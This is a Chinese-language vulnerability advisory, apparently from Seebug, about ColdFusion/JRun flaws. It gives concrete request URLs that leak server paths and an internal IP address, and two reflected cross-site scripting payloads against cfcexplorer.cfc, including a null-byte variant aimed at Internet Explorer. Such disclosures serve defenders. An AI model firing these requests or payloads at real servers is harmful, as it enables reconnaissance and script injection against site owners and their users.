泄漏服务器路径: http://serverip/page1.htm/a.cfm http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm http://serverip/jrunscripts/jrun.ini/a.cfm http://serverip/jrunscripts/jrunserver.store/a.cfm http://serverip/jrunscripts/readme.txt/a.cfm 上述请求会返回类似于以下的结果: Error parsing the Tag Library Descriptor file:/d:/sekretpath/hidden/page1.htm/.. 泄漏内部IP地址: ------------------------------------------------------------------ GET /CFIDE/administrator/login.cfm HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Thu, 09 Nov 2006 05:44:02 GMT <html> <head> <LINK REL="SHORTCUT ICON" href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico"> ------------------------------------------------------------------ 跨站脚本: http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><script>alert()</script> 如果能在<script>注入%00的话,就可以对Internet Explorer用户执行跨站脚本攻击。 http://server/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtmtestl&name=CFIDE.adminapi.administrator&path=/cfide/adminapi/administrator.cfctest"><%00script>alert(document.domain)</script>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
共 1 兑换
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论